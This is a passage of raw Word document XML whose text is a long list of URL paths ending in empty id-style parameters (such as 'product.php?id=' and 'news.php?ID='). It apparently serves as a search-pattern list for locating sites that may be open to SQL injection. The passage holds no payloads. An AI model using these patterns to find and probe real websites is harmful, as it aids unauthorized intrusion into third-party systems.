          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>product</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product.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2E9C9E"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r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>store/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>description.php?iddesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3B235B"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socsci</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news_items</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full_story.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C81841"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naboard</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memo.php?bd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17571FF3"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r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bookmark/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>mybook</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bookmark.php?bookPageNo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047178CF"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board</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board.html?table</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10345FC7"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kboard</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kboard.php?board</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444B0476"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order.asp?lotid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF6F6AE"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goboard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/front/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>board_view.php?code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796217DF"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bbs</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bbsView.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433ABBB9"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boardView.php?bbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F408FD5"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lastRenderedPageBreak/>
        <w:t>eng</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rgboard</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view.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>?&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bbs_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADAC03D"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product</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product.php?cate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250DA02E"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content.php?p</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C6CB25"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page.php?module</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636C1A63"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pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453D40E6"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bookpage.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EF97D6"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cbmer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/congres/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>page.php?LAN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A0D63D"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content.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5047D8C5"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news.php?ID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F53EC02"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photogallery.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0191FEE5"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index.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EC3589"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product</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product.php?product_no</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CEB843"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nyheder.htm?show</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7FD26F"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book.php?ID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB8BBFA"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print.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19101C85"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detail.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A22E4B9"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book.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AD4ED8"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content.php?PID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB692CD"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more_detail.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2AB69D"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content.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAC6D58"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view_items.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EB8750"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view_author.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB2C055"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main.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D896687"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english</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/fonction/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>print.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2F2739"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r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>magazines/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>adult_magazine_single_page.php?magid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B00C245"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product_details.php?prodid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4729C7FA"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r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>magazines/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>adult_magazine_full_year.php?magid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E9A5C7"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products</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card.php?prodID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2689829C"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catalog</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product.php?cat_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046460CF"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e_board</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modifyform.html?code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E29947"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community</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calendar-event-fr.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251EF57D"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lastRenderedPageBreak/>
        <w:t>products.php?p</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBC74D5"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news.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDAE099"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StoreRedirect.php?ID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E749E3"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subcategories.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320A707E"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r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>tek9.php?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558A623F"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template.php?Action</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Item&amp;pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
